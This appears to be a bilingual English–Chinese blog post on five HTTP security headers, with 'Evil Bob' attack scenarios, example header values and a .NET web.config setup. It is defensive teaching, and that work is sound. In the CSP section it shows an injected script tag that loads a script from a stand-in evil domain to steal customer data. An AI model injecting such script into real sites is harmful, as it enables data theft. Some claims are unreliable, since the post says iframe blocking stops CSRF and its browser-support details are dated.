http标头
2020年排名前5位的HTTP安全标头 (Top-5 HTTP Security Headers in 2020)
Nowadays, security is important as never before. I've prepared a very small article about the Top-5 security headers in 2020 that will help your site keep your users in safety. Have a nice reading!
如今,安全性从未像现在这样重要。 我编写了一篇关于2020年Top-5安全标头的非常小的文章,这将有助于您的网站保持用户的安全。 祝您阅读愉快!
内容安全政策 (Content-Security-Policy)
One of the most important security header. It was created to prevent the usage of any resource from an untrusted source.
最重要的安全头之一。 创建它是为了防止使用不受信任来源的任何资源。
Let's go to the short example first:
让我们先来看简短的示例:
Evil Bob found XSS vulnerability on Alice's site. He decides to inject the script into the web-page to steal some customer data. He put this script tag into her page
Evil Bob在Alice的站点上发现了XSS漏洞。 他决定将脚本注入网页中,以窃取一些客户数据。 他将此脚本标签放到她的页面中
<script src="https://my-evilt-site.org/very-evil-script.js"></script>and waits for the results
然后等待结果
Luckily, Alice knows about CSP header and already added it to the response: Content-Security-Policy: default-src 'self'. Now, a browser already knows, that scripts (and images, and fonts, and styles) not from origin domains are forbidden to use and Bob's attack fails.
幸运的是,爱丽丝了解CSP标头并将其添加到响应中: Content-Security-Policy: default-src 'self' 。 现在,浏览器已经知道,禁止使用非原始域中的脚本(以及图像,字体和样式),并且Bob的攻击失败了。
Withing this header you can deny inline scripts and eval usage (goodbye inline XSS), specify a checksum for the scripts (good by substitution of the 3rd party scripts), allow specific domains for your images, fonts, and styles. It can restrict fetch requests, deny usage of your site inside an iframe (goodbye CSRF) and much more. CSP header is very flexible and can support almost all of your needs.
使用此标头,您可以拒绝内联脚本和评估使用情况(再见内联XSS),为脚本指定校验和(通过替换第3方脚本来实现),为图像,字体和样式允许特定的域。 它可以限制获取请求,拒绝在iframe(再见CSRF )内使用您的网站,等等。 CSP标头非常灵活,可以满足您的几乎所有需求。
我可以用吗? (Can I use?)
CSP header supported by almost all browsers including IE (but with a special name — X-Content-Security-Policy). Some of the directives may not be supported across different browsers but this will not ruin the header.
几乎所有浏览器(包括IE)都支持 CSP标头(但具有特殊名称-X-Content-Security-Policy)。 不同浏览器可能不支持某些指令,但这不会破坏标头。
代码示例 (Code Example)
Allow all remote resources from your domain (No external API calls allowed!):
允许您域中的所有远程资源(不允许外部API调用!):
Content-Security-Policy: default-src 'self- Allow all remote resource from your domain and external API calls (IFraming is allowed): 允许来自您的域和外部API调用的所有远程资源(允许IFraming):
Content-Security-Policy: default-src 'self'; connect-src 'self' https://my-example-api.ua- Allow all remote resource from your domain, external API calls, disallow iframing your site: 允许您域中的所有远程资源,外部API调用,禁止对您的网站进行格式化:
Content-Security-Policy: default-src 'self'; connect-src 'self' https://my-example-api.ua; frame-ancestors 'none';- Disallow everything except whitelisted: 禁止除白名单外的所有内容:
Content-Security-Policy: default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self'; frame-ancestors 'none'- Disallow everything except whitelisted (with inline css): 禁止除白名单外的所有内容(内联CSS):
Content-Security-Policy: default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'none'Examples are simplified just to give you a better understanding of the CSP header power. For additional info check the mdn page and the CSP Cheat Sheet is also very useful.
例子被简化只是为了让您更好地了解CSP标头功能。 有关其他信息,请查看mdn页面 , CSP 备忘 单也非常有用。
Important Notice: If you need to deny the possibility to iframe your site in IE — you should use X-Frame-Options
重要说明 :如果您需要拒绝在IE中对网站进行iframe的可能性,则应使用X-Frame-Options
X内容类型选项 (X-Content-Type-Options)
This is a bit tricky header but it works very well with CSP, so it worth mentioning.
这个标题有些棘手,但它与CSP配合得很好,因此值得一提。
Imagine, that Evil Bob found XSS on Alice's site and tries to put some malicious script inside. But Alice already has setup CSP policy, so his attempt to download JavaScript from untrusted resources fails. But Evil Bob is smart. He changes the type of the injected script to "text/plain". Now, CSP protection will allow loading script, because it is not JavaScript anymore and should not be executed. But sometimes, browsers try to be too smart. They may check the content of the loading "text", and decide to execute it as JavaScript. This named sniffing and this behavior varies depending on the browser.
想象一下,Evil Bob在Alice的网站上找到了XSS,并试图将一些恶意脚本放入其中。 但是Alice已经设置了CSP策略,因此他尝试从不受信任的资源中下载JavaScript的尝试失败了。 但是邪恶的鲍勃很聪明。 他将注入脚本的类型更改为“文本/纯文本”。 现在,CSP保护将允许加载脚本,因为它不再是JavaScript,并且不应执行。 但是有时候,浏览器会变得过于聪明。 他们可以检查正在加载的“文本”的内容,并决定将其作为JavaScript执行。 此命名嗅探和此行为因浏览器而异。
This header tells the browser, strictly follow provided Mime/Type, and don't try to guess.
此标头告诉浏览器,严格遵循提供的Mime / Type,不要试图猜测。
我可以用吗? (Can I use?)
Supported by all browsers except Safari.
除Safari外,所有浏览器均支持 。
代码示例 (Code Example)
Only one option is possible:
只能有一种选择:
X-Content-Type-Options: nosniff功能政策 (Feature-Policy)
This header is designed to turn off features that you don't expect to be used.
此标头旨在关闭您不希望使用的功能。
Alice has a nice and shiny site with a big audience. Evil Bob found XSS and decided to use Alice's site for spying using a user's web camera. So he injects malicious code and waits for the dozen of the new videos.
爱丽丝(Alice)有一个吸引人的漂亮站点。 Evil Bob找到了XSS,并决定使用Alice的网站进行用户网络摄像头的间谍活动。 因此,他注入了恶意代码,并等待十几个新视频。
But, fortunately, Alice already set Feature-Policy header to Feature-Policy: camera 'none'
但是,幸运的是,爱丽丝已经将Feature-Policy标头设置为Feature-Policy: camera 'none'
Now, browsers know, that using a camera is not permitted for anyone, and Bob's attempt fails. Of course, you can turn off not only a camera but also autoplay (useful when you are showing some ads from 3rd party vendors), microphone and very much more. If you don't want to turn it off for all, you can allow to use it only for code from your domain.
现在,浏览器知道,任何人都不允许使用相机,而鲍勃的尝试失败了。 当然,您不仅可以关闭相机,还可以关闭自动播放功能(当您显示来自第三方供应商的一些广告时很有用),麦克风等等。 如果您不想全部关闭它,则可以只将其用于您域中的代码。
我可以用吗? (Can I use?)
Partially supported by most of the browsers and not supported by the IE.
大多数浏览器部分支持该功能,而IE不支持。
代码示例 (Code Example)
Disabling geolocation:
禁用地理位置:
Feature-Policy: geolocation 'none'Disabling other sensitive features:
禁用其他敏感功能:
Feature-Policy: camera 'none'; microphone 'none'; geolocation 'none'; autoplay 'none'; display-capture 'none'; payment 'none'Check mdn for the full list of the available features.
检查mdn以获取可用功能的完整列表。
严格的运输安全 (Strict-Transport-Security)
This is a very simple header for those who use HTTPS. It tells the browser to use an only HTTPS connection, even if the user is trying to use HTTP.
对于使用HTTPS的用户来说,这是一个非常简单的标头。 它告诉浏览器仅使用HTTPS连接,即使用户尝试使用HTTP。
Let's imaging that Alice is sitting in a public place and use public WiFi. Evil Bob is sitting not very far from her and trying to sniff all non-encrypted traffic. Alice decides to visit some online-shop and uses an old and good link like www://my-example-shop.com. Evil Bob sees her request (it's not encrypted) and starts recording Alice's activity hoping to get credit card information. But, after the first request, the shop returns STS header: Strict-Transport-Security: max-age=31536000. And browsers automatically redirects Alice to the HTTPS version of the page. From now, Evil Bob sees only encrypted traffic and can't steal anything.
让我们想象一下爱丽丝正坐在公共场所并使用公共WiFi。 邪恶鲍勃坐在离她不远的地方,试图嗅探所有未加密的流量。 爱丽丝决定访问一些在线商店,并使用一个很好的旧链接,例如www://my-example-shop.com。 Evil Bob看到了她的请求(未加密),并开始记录Alice的活动,希望获得信用卡信息。 但是,在发出第一个请求后,商店将返回STS标头: Strict-Transport-Security: max-age=31536000 。 浏览器会自动将Alice重定向到页面的HTTPS版本。 从现在开始,Evil Bob仅看到加密的流量,无法窃取任何东西。
我可以用吗? (Can I use?)
Supported by all browsers except Opera Mini. And Yes, IE also supports this header.
除Opera Mini以外的所有浏览器均支持 。 是的,IE也支持此标头。
代码示例 (Code Example)
Strict-Transport-Security: max-age=31536000; includeSubDomains推荐人政策 (Referrer-Policy)
Controls how much of the referrer information (host, query params, etc) are sent within the request.
控制在请求中发送多少引荐来源信息(主机,查询参数等)。
Short example:
简短示例:
Alice has a forum about cats with lots of links to other resources. When a user clicks on the link, he is navigated to another web page, and this web page can gather some information about the source of the navigation. You value the privacy of your users and want to keep this information secret. You set referrer-Policy header and deny browser to send referrer information for all except your self.
爱丽丝有一个关于猫的论坛,其中有许多其他资源的链接。 当用户单击链接时,他将导航到另一个网页,并且该网页可以收集有关导航源的一些信息。 您重视用户的隐私,并希望将此信息保密。 您设置了Referrer-Policy标头,并拒绝浏览器发送除您自己之外的所有其他人的Referrer信息。
我可以用吗? (Can I use?)
Mostly Supported with all (IE — partially) browsers except Opera Mini
除Opera Mini以外的所有(IE-部分)浏览器均受支持
代码示例 (Code Example)
Showing referrer info only for the origin:
仅显示来源的推荐人信息:
Referrer-Policy: same-origin摘要: (Summary:)
As far as I use .NET, here is the result setup for web.config: (note, unsafe js inline is not supported):
就我使用.NET而言,这是web.config的结果设置:(请注意,不支持不安全的js内联):
<customHeaders>
<add name="Content-Security-Policy" value="default-src 'none'; img-src 'self'; font-src 'self'; connect-src 'self' https://my-example-api.ua; script-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'none'" />
<add name="Feature-Policy" value="camera 'none'; microphone 'none'; geolocation 'none'; autoplay 'none'; display-capture 'none'; payment 'none'" />
<add name="X-Content-Type-Options" value="nosniff"/>
<add name="Referrer-Policy" value="same-origin"/>
<add name="Strict-Transport-Security" value="max-age=31536000"/>
</customHeaders>有用的链接: (Useful links:)
Bonus: web.config with all set headers can be found here
奖励:所有设置标头的web.config均可在此处找到
Stay safe and don't forget to remove x-powered header! :)
保持安全,别忘了卸下x供电的接头! :)
[Thanks to John Salvino for the photo]
[感谢约翰·萨尔维诺的照片]
Author's blog: http://drag13.io/
作者的博客: http : //drag13.io/
http标头
324
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
